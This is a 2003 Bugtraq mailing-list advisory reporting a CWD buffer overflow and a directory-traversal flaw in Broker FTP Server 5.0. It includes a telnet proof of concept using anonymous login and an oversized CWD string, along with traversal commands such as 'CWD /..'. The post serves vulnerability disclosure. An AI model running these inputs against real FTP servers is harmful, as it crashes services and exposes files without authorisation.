Bugtraq mailing list archives
Buffer Overflow in Broker FTP Server
From: subj <r2subj3ct () dwclan org>
Date: 30 Mar 2003 19:32:30 -0000
Product : Broker FTP Server Version : 5.0 OSystem : Windows Authors : TransSoft WebSite : http://www.ftp-broker.com Problem : * Buffer Overflow in field CWD * Access to all files on a disk #[Denial of Service]# Description: ------------ eng: ==== To arrange overflow in field CWD, necessary to send on it more than 256 bytes of dust. After that server will fall, and will not submit any life attributes. Exploit: -------- *************************************
Telnet 127.0.0.1:21
220 FTP Server Ready [***]
USER anonymous
331 Password required for anonymous.
PASS anonymous@localhost
230-Welcome to Broker FTP Server. 230- 230 User anonymous logged in. CWD AAAAAAAAAAA......AAAAA [256b] ************************************* #[Access to all files on a disk]# Description: ------------ rus: ==== За счет этой уязвимости вы можете получить доступ ко всем файлам на жестком диске сервера eng: ==== Due to this vulnerability you can get access to all files on a hard drive of the server Exploits: Current Directory : "/" CWD * CWD /* CWD /.. CWD /... CWD /.../ Contacts: --------- r2subj3ct () dwclan org subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc Thanks: ------- DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
Current thread:
- Buffer Overflow in Broker FTP Server subj (Apr 01)
- Re: Buffer Overflow in Broker FTP Server Knud Erik Højgaard (Apr 09)